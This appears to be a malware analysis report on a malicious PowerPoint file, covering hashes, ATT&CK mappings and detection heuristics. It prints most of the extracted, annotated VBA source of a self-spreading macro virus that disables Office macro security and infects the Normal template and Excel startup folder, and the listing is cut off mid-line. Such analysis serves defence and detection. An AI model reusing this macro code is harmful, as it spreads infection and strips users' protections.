Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a13dac2c6f7b430d…

MALICIOUS

Office (OLE)

107.0 KB Created: 2001-10-29 02:05:31 Authoring application: Microsoft PowerPoint First seen: 2012-06-14
MD5: e49236c182da6065c20a0837aaf5d9ea SHA-1: e9bb693a25e673313db8da38e707f9dab24983df SHA-256: a13dac2c6f7b430d09845aae24ed84c22e3d1dc225fc5ae9939956d67d1ee286
160 Risk Score

Malware Insights

MITRE ATT&CK
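T1059.005 Visual Basic; T1505.003 Server Software Component: Office Application Startup (note: the ID and name shown here do not match — in ATT&CK, "Office Application Startup" is technique T1137, while T1505.003 is Web Shell); T1547.001 Registry Run Keys / Startup Folder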

This PowerPoint file contains VBA macros, including a Document_Open macro designed to execute automatically. The script attempts to disable macro security settings and to inject its code into other Office documents, including Word's Normal template (NormalTemplate), using CreateObject to automate Excel. The extracted code also saves a copy of itself as a workbook in Excel's startup folder, so that it loads each time Excel starts. This behavior is indicative of self-propagating macro malware.

Heuristics 3

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5827 bytes
SHA-256: dc30724900d4d32bd85bf45d589cfe399e4f8feeb592f67ebf8c4adfa11dc0d1
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

'kr1tz do this.....!
' Analyst annotation: InfectDoc is the Word-side replication routine of this sample.
' It (1) weakens Word's macro-security UI and settings, (2) picks a source module and a
' target (Normal template <-> active document), (3) plants a copy of the code in a
' workbook saved to Excel's startup folder, and (4) overwrites the target's document
' module with its own code. Takes no parameters and returns nothing.
' Detection pointers: the marker literal passed to CodeModule.Find below, the "Book1."
' file name in Excel's startup path, and writes to the Office\9.0\Word\Security key.
Private Sub InfectDoc()
' All runtime errors are suppressed, so every step below fails silently if it cannot run.
On Error Resume Next
' VBA quirk: only SaveVict is declared Boolean here; InstMast is an untyped Variant.
Dim InstMast, SaveVict As Boolean
InstMast = False
' Branch on whether the "Level1" value exists under the Office 9.0 Word\Security key
' (9.0 corresponds to Office 2000). Registry access goes through System.PrivateProfileString.
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level1") <> "" Then
    ' Greys out the "Security..." entry of the Macro menu so the user cannot change the level.
    CommandBars("Macro").Controls("Security...").Enabled = False
    ' Overwrites the registry value with an empty string.
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level1") = ""
Else
    ' Value absent: disable the Tools > Macro menu and switch off the Word options that
    ' would warn the user (macro virus protection, Normal-template save prompt,
    ' conversion confirmation).
    CommandBars("Tools").Controls("Macro").Enabled = False
    With Options
        .VirusProtection = False
        .SaveNormalPrompt = False
        .ConfirmConversions = False
    End With
End If
' Choose direction of infection: Mast is the module the code is copied from, Vict the target.
' Running from the Normal template -> target is the active document, and vice versa.
' CodeMast receives the full text of the first VB component of the source.
If MacroContainer = NormalTemplate Then
    Set Mast = NormalTemplate.VBProject.VBComponents.Item(1)
    Set Vict = ActiveDocument
    CodeMast = Mast.CodeModule.Lines(1, Mast.CodeModule.CountOfLines)
ElseIf MacroContainer = ActiveDocument Then
    Set Mast = ActiveDocument.VBProject.VBComponents.Item(1)
    Set Vict = NormalTemplate
    CodeMast = Mast.CodeModule.Lines(1, Mast.CodeModule.CountOfLines)
End If
' NOTE(review): DisVirProt is not defined in the visible part of the listing; the name
' suggests a further protection-disabling helper - confirm against the full macros.bas.
DisVirProt
' Cross-application step: start Excel through COM automation.
Set xl = CreateObject("Excel.Application")
' If no file named "Book1." exists in Excel's startup path, create a workbook, write the
' copied code into its ThisWorkbook module and save it there. Workbooks in the startup
' folder are opened by Excel at launch, which gives the code persistence in Excel.
If UCase(Dir(xl.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
    Set Mastxl = xl.Workbooks.Add
    Mastxl.VBProject.VBComponents("ThisWorkbook").CodeModule.AddFromString CodeMast
    Mastxl.SaveAs FileName:=xl.Application.StartupPath + "\Book1."
End If
xl.Quit
SaveVict = False
' SaveVict becomes True unless the first three characters of the target's FullName are
' "DOC" (case-insensitive) - presumably to skip unsaved "DocumentN" files; verify.
If UCase(Mid(Vict.FullName, 1, 3)) <> UCase("DOC") Then SaveVict = True
' Walk every VB component of the target. Type 100 is the document module
' (vbext_ct_Document); all other component types are deleted via the Organizer.
For Each fVict In Vict.VBProject.VBComponents
    If (fVict.Type <> 100) Then
        Application.OrganizerDelete Vict.FullName, fVict.Name, wdOrganizerObjectProjectItems
    ' A document module that does not contain the marker string is treated as not yet
    ' infected: its existing code is wiped and InstMast is set to request installation.
    ElseIf (fVict.Type = 100) And (fVict.CodeModule.Find("kr1tz", 1, 1, 10000, 10000) = False) Then
        fVict.CodeModule.DeleteLines 1, fVict.CodeModule.CountOfLines
        InstMast = True
    End If
Next fVict
' Rebind Vict from the document/template object to its first VB component.
Set Vict = Vict.VBProject.VBComponents.Item(1)
If InstMast = True Then
    ' Write the copied code into the target module, then persist the change to disk.
    Vict.CodeModule.AddFromString CodeMast
    ' As written, the Normal template is saved only when its Saved flag is already True.
    If NormalTemplate.Saved = True Then NormalTemplate.Save
    If SaveVict = True Then ActiveDocument.Save
End If
End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
Set Vict = ActiveWorkbook.VBProject.VBComponents.Item(1).CodeModule
Set Code = ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule
CodeMast = Code.Lines(1, Code.CountOfLines)
CommandBars("Tools").Controls("Macro").Enabled = False
If UCase(Dir(Application.StartupPath & "\Book1.")) <> "BOOK1" Then
Set xlApp = CreateObject("Excel.Application")
Set BookMast = xlApp.Workbooks.Add
BookMast.VBProject.VBComponents.Item(1).CodeModule.InsertLines 1, CodeMast.Lines(1, CodeMast.CountOfLines)
BookMast.SaveAs FileName:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
xlApp.Quit
End If
Set wd = CreateObject("Word.Application")
wd.Options.SaveNormalPrompt = False
For i = 1 To wd.NormalTemplate.VBProject.VBComponents.Count
Set wdNT = wd.NormalTemplate.VBProject.VBComponents(i)
If wdNT.Type <> 100 Then
wd.Application.OrganizerDelete wd.NormalTemplate.FullName, wd.NormalTemplate.VBProject.VBComponents(i).Name, wd.wdOrganizerObjectProjectItems
ElseIf (wdNT.Type = 100) And (wdNT.CodeModule.Find("kr1tz", 1, 1, 10000, 10000) = False) Then
If wdNT.CodeModule.CountOfLines <> 0 Then
wdNT.CodeModule.DeleteLines 1, wdNT.CodeModule.CountOfLines
End If
wd.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString CodeMast
End If
Next i
Set wd = Nothing
wd.Quit
For i = 1 To ActiveWorkbook.VBProject.VBComponents.Count
If ActiveWorkbook.VBProject.VBComponents(i).CodeModule.Find("'Code", 1, 1, 1000, 1000) = False Then
ActiveWorkbook.VBProject.VBComponents(i).CodeModule.DeleteLines 1, ActiveWorkbook.VBProject.VBComponents(i).CodeModule.CountOfLines
Addi = ActiveWorkbook.VBProjec
... (truncated)